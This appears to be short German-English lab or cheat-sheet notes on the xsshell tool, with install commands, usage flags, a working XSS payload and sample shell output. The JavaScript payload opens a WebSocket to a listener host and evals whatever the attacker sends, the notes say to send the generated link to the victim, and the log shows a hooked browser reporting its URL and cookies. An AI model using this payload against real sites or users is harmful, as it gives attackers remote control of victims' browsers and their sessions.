Xsshell
git clone
- sudo apt-get install go
- go get github.com/raz-varren/xsshell
- go install github.com/raz-varren/xsshell
start
- ./xsshell -host 127.0.0.1 -port 4444
xsshell -h Usage of xsshell:
-cert string ssl cert file -host string websocket listen address -key string ssl key file -log string specify a log file to log all console communication -path string websocket connection path (default "/s") -port string websocket listen port (default "8234") -servdir string specify a directory to serve files from. a file server will not be started if no directory is specified -servpath string specify the base url path that you want to serve files from (default "/static/") -wrkdir string working directory that will be used as the relative root path for any commands requiring user provided file paths
Payload
- Payload muss ins Eingabefeld
- Generierter Link wird zum Opfer geschickt
JS Script : <script>(function(){function e(a,b){return function(){return eval(a)}.call(b)}var d=new WebSocket("ws://10.82.70.52:4444/s"),f=function(a){this.send=function(b,c){d.send((c?"z":"")+a+b)}};d.onmessage=function(a){a=a.data;var b=new f(a.slice(0,8));try{e(a.slice(8),b)}catch(c){b.send(c,!0)}}})();</script>
Die Shell
start socket: 1, header: AqHFTtA
socket connected: 1
user agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:90.0) Gecko/20100101 Firefox/90.0 page url: http://127.0.0.1/xss.php?msg=?
referrer: http://127.0.0.1/xss.php?msg=? cookies:
end socket: 1, header: AqHFTtA
Auf dem Client
